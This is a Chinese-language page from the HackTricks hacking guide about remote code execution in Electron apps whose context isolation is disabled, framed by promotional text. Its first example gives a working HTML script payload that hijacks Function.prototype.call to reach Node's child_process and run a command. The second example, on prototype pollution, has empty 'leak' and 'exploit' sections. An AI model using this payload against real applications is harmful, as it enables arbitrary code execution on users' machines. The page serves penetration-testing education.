Electron contextIsolation RCE via Electron internal code

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS Red Team Expert）！

您在网络安全公司工作吗？您想看到您的公司在HackTricks中做广告吗？或者您想访问PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划!
发现我们的独家NFTs收藏品The PEASS Family
获取官方PEASS和HackTricks周边产品
加入 💬 Discord群 或 电报群 或在Twitter上关注我 🐦@carlospolopm。
通过向hacktricks repo和hacktricks-cloud repo提交PR来分享您的黑客技巧。

示例 1

来自https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41

当页面加载开始时，"exit"事件侦听器总是由内部代码设置。此事件在导航之前发出：

process.on('exit', function (){
for (let p in cachedArchives) {
if (!hasProp.call(cachedArchives, p)) continue
cachedArchives[p].destroy()
}
})

https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- 不再存在

然后跳到这里：

其中 "self" 是 Node 的 process 对象：

process 对象有一个指向 "require" 函数的引用：

process.mainModule.require

由于 handler.call 将接收 process 对象，我们可以覆盖它以执行任意代码：

<script>
Function.prototype.call = function(process){
process.mainModule.require('child_process').execSync('calc');
}
location.reload();//Trigger the "exit" event
</script>

示例 2

获取原型污染中的 require 对象。来自 https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81

泄漏：

利用：

从零开始学习 AWS 黑客技术，成为专家 htARTE（HackTricks AWS 红队专家）！

您在网络安全公司工作吗？想要看到您的公司在 HackTricks 中被宣传吗？或者您想要访问PEASS 的最新版本或下载 HackTricks 的 PDF吗？请查看订阅计划!
探索PEASS 家族，我们的独家NFT收藏品
获取官方 PEASS & HackTricks 商品
加入 💬 Discord 群组 或 电报群组 或在 Twitter 上关注我 🐦@carlospolopm。
通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享您的黑客技巧。

上一页Electron contextIsolation RCE via preload code 下一页Electron contextIsolation RCE via IPC

最后更新于7个月前